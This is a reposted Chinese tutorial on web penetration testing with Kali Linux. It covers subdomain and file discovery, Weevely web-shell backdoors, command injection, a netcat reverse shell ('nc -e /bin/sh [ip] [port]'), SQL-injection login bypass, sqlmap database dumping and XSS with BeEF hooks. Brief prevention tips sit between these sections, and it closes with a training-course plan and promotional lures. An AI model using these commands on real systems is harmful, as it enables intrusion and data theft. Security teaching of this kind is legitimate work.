使用 Kali Linux 进行 Web 渗透测试

这篇具有很好参考价值的文章主要介绍了使用 Kali Linux 进行 Web 渗透测试。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Web渗透:如何使用 Kali Linux 来访问目标 PC!什么是 Kali Linux?“Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审核”。

网络信息收集

在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。

一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的另一种方法是使用 bing 和 search ip。

使用 Kali Linux 进行 Web 渗透测试,linux,前端,运维,服务器,安全

发现子域

使用名为“knock”的工具(通常安装到 Kali 上的 /opt 中)。与 Kali Linux 上的大多数工具一样,Knock 是开源的,可以在https://github.com/guelfoweb/knock找到。

git clone <https://github.com/guelfoweb/knock.git>
cd 进入文件夹。
python knock.py 目标

如果不起作用,尝试使用 --resolve 运行上述命令,然后再次运行上述命令。

发现敏感文件

DIRB 是一个 Web 内容扫描器,它查找现有(或隐藏)的 Web 对象,在Web渗透中非常有用!DIRB 的工作原理是对 Web 服务器发起字典攻击并分析响应(本质上只是尝试不同的文件名并查看是否有响应)。

dirb [目标] [字典] [选项]

  1. /:通常表示您位于一个目录中。
  2. phpinfo.php:非常有用的信息
  3. robots.txt:管理员不希望我们看到的隐藏信息。

利用服务器漏洞

利用服务器漏洞进行Web渗透到常见方式,以下是利用 Web 服务器获得不同结果的一系列方法。

利用文件上传漏洞获取访问权限

Weevely 是一个隐秘的 Web shell,用于模拟类似 telnet 的连接。这可用作后门和/或管理 Web 服务器上的 Web 帐户。

创建后门:

weevly generate [密码] [路径+文件名]

上传文件:

weevly [文件地址]- 连接到文件

在尝试使用工具之前,只需浏览网站并感受一下,寻找功能中的漏洞,特别是网站是否允许上传。

利用代码执行漏洞

始终尝试您看到的任何输入框,因为它们正在执行命令,您也许可以更改该命令。
可以使用" && “或” ; "在unix中,可以在一行中执行多个命令。测试输入框是否允许这样做。
大多数服务器都有 python 和 netcat。
监听传入连接,例如使用 netcat:

netcat -vv -l -p [端口]- 侦听端口 8080 上的连接
IE。nc -e /bin/sh [ip] [端口] - netcat 连接。

下面是您可以执行以获得不同受支持语言的反向连接的命令列表。其中要更改的变量由[HOST_IP]和 表示,可以选择更改端口。请注意,这些都是“一行代码”,因此它们可以在输入框中执行。

预防 Web 服务器漏洞

发生上述情况只是因为服务器允许并且配置错误。

  1. 文件上传漏洞

    • 不允许上传不安全的文件。
    • 如果您要求提供图像,请确保它是图像,切勿允许 exe 上传。
    • 检查文件类型,而不是扩展名。
  2. 代码执行漏洞

    • 不要使用危险的功能,
    • 执行前过滤输入
    • 如果必须使用函数,请确保在执行之前分析输入。
    • 使用正则表达式(regex)。
  3. 文件包含漏洞

    • 禁用 php 中的allow_url_fopen 和allow_url_include 设置(在/etc/php5/cgi/php.ini 中)
    • 使用静态文件包含(对文件进行硬编码)

SQL注入和攻击

连接到 mySQL 数据库:

mysql -u [用户名] -h [IP of server]
show 数据库
use [数据库]
show tables

通过注入绕过登录

另一个巧妙的用途是注入 SQL 查询,使得查询最终为SELECT * from accounts where user=‘admin’ and password=‘wrong_password’ or 1=1,这可能会以管理员身份登录我们,而根本不知道密码,因为如果查询评估 1 为,则 and 语句中的第二种情况将为 True等于 1。这在Web渗透中有很大的作用。

发现数据检索 (GET) 中的 SQL 注入

始终尝试在 php 脚本中注入内容(在地址栏中,它看起来像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx确保对符号使用 URL 编码,即。# = %23
按列 100000 排序将返回错误,继续按 1,2,3,4,5 进行排序。

使用 SQLmap 执行上述及更多操作

sqlmap --help
sqlmap -u "[target_url]"
sqlmap -u "[target_url]" --dbs
获取数据库
sqlmap -u "[target_url]" --current-user
获取用户
sqlmap -u "[target_url]" --current-db
当前数据库
sqlmap -u "[target_url]" --tables -D [database]
获取-D数据库中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
获取数据库表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump

获取数据库表中的所有数据

SQL漏洞防范

  • 使用过滤器(但可以绕过)
  • 使用拒绝列表或允许列表。(但可以绕过)
  • 最好的方法是以不允许代码注入的方式对 Web 应用程序进行编码。
  • 要执行上述操作,您必须使用参数化语句。(其中数据和代码是分开的)

跨站脚本(XSS)

在浏览网站的人而不是服务器上执行。允许将 javascript 注入到页面上。页面加载时执行代码。

三个主要类型

  1. 持久/存储型 XSS
  2. 反射型 XSS - 非持久性 XSS。仅当目标访问特制的网址时才有效,例如。target.com/page.php?something=alert(‘xss’)
  3. 基于 DOM 的 XSS

使用参数(php 的东西)测试文本框和 url。

将牛肉钩注入易受攻击的页面。如果文本区域有最大长度,请进入开发人员控制台并检查元素并更改最大长度。

XSS漏洞防范

  • 最小化输入。
  • 将用户输入转换为 html 字符符号 so&nsb并使用 代替 & &jsjs;。
  • 转义输入。
  • 很少信任浏览器内的警报!

自动发现Web漏洞

使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已经安装在 Kali 上。

  1. 在应用程序中搜索 ZAP
  2. 您必须通过 github 获取此应用程序。
  3. chmod +x [文件名]
  4. 运行
  5. 安装后点击不再持久。
  6. 左侧的齿轮图标允许修改选项
  7. 如果您单击底部窗口上的绿色加号,则转到活动扫描。然后,您可以在窗口左上角的小面板中更改策略。
  8. 在自动扫描中添加 url。
  9. 警报下方的左下角显示了所有已发现的漏洞。
  10. 如果您右键单击其中一个警报(左下角),然后在浏览器中打开,它将向您显示该漏洞及其如何获取它。

Web渗透归根结底还是几个技术活,所以要学习的东西还是很多的!

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
使用 Kali Linux 进行 Web 渗透测试,linux,前端,运维,服务器,安全
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉【整整282G!】网络安全&黑客技术小白到大神全套资料,免费分享!

使用 Kali Linux 进行 Web 渗透测试,linux,前端,运维,服务器,安全

学习资料分享

当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。文章来源地址https://www.toymoban.com/news/detail-817624.html

使用 Kali Linux 进行 Web 渗透测试,linux,前端,运维,服务器,安全

到了这里,关于使用 Kali Linux 进行 Web 渗透测试的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux渗透测试技术详解_渗透测试入门

    知识点 1. Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. 基本用法-重新设置root密码 5 安装debian11系统-默认命令行模式登录 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、

    2024年02月13日
    浏览(56)
  • 渗透测试(8)- Kali Linux 系统概述

        Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。Kali Linux 是一款全功能的安全操作系统,它可以帮助用户完成各种安全任务,包括网络渗透测试、系统攻击、密码破解、恶意软件分析、社会工程学攻击等,同时也可以用于安全研究,帮助

    2024年01月17日
    浏览(41)
  • 【Kali Linux】高级渗透测试实战篇

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(42)
  • 从实践中学习Kali Linux渗透测试

    目录 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 1.1.2 白盒测试 1.1.3 灰盒测试 1.2 渗透测试流程 1.3 Kali Linux系统概述 1.3.1 为什么使用Kali Linux 1.3.2 Kali Linux发展史 1.4 法律边界 1.4.1 获取合法权限 1.4.2 部分操作的危害性 第二章 安装Kali Linux系统 2.1 下载镜像 2.1.1 获取

    2023年04月08日
    浏览(42)
  • Kali Linux渗透测试技术介绍【文末送书】

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月09日
    浏览(45)
  • 渗透测试-Kali Linux 正确清理垃圾的姿势

    当kali在运行和我们“肾透”过程中会产生很多的垃圾文件。如何正确的清理这些垃圾文件呢?stacer是一款图形化的垃圾清理和系统管理工具。有进程管理、开机启动项管理、可视化软件安装和卸载。对于不熟悉Linux命令的小白而言是非常友好的。 apt-get install stacer apt-get remo

    2024年02月02日
    浏览(43)
  • 渗透测试学习(一)—— Kali Linux的安装图文详解

    目录 一、Kali Linux 2022.4镜像下载 二、VMware 安装 Kali 镜像 安装版的Kali 免安装版Kali官方VMware镜像 打开Kali官网 www.kali.org 点击Download跳转到下载界面,这里我们选择虚拟机版本,博主采用的是VMware虚拟环境搭建,选择合适的下载方式。 直接下载可能比较慢,我们可以选择torre

    2024年02月02日
    浏览(71)
  • 【小吉送书—第一期】Kali Linux高级渗透测试

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(57)
  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(42)
  • 用于黑客渗透测试的 21 个最佳 Kali Linux 工具

    如果你读过 Kali Linux 点评,你就知道为什么它被认为是最好的黑客渗透测试的 Linux 发行版之一,而且名副其实。它带有许多工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。 它是道德黑客ethical hacker最推荐的 Linux 发行版之一。即使你不是黑客而

    2024年02月10日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包